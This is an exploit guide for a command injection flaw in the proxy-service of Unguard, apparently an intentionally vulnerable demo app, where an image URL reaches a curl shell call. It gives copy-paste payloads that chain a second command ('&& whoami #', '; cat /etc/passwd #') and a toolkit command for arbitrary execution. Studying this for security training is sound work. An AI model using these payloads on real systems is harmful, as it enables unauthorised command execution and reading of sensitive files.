Command injection (sometimes CMD injection) is an attack that involves executing arbitrary commands on some host OS. Typically, this happens because of insufficient user input validation.
When posting images in Unguard, the user-controlled image URL is passed to the curl CLI program,
making it possible to encode additional commands that will then just be executed on the proxy-service.
For this exploit to work you need:
- unguard deployed and running
- (optional) unguard-exploit-toolkit set up
To exploit the command injection vulnerability in the proxy-service, you have to simply log into Unguard
and post an image with an URL that adds a second command to the curl call.
Without the CLI, you can simply craft your own payload:
Posting the following will result in executing whoami after example.com has been fetched.
Notice the trailing # will comment out all the other original curl arguments, which is essential.
example.com && whoami #
Sending that request will result in a similar command to be executed on the proxy-service:
/bin/sh -c curl --silent -S example.com && whoami # --max-time 10 --output somepath.jpgA few more example payloads that can be copied and pasted into the image URL field:
# This will write linux kernel information into a file
example.com && uname -a > pwned ## This will simply print /etc/passwd (invisible to the attacker)
; cat /etc/passwd #Using the CLI, you can specify any command to be executed.
Make sure to use ug-exploit login first, as you need to be logged in to post content.
Afterwards, just use ug-exploit cmd-inject-proxy "<your-command>" to execute arbitrary commands.
Writing current user into a file
$ ug-exploit cmd-inject-proxy "whoami > /tmp/pwned"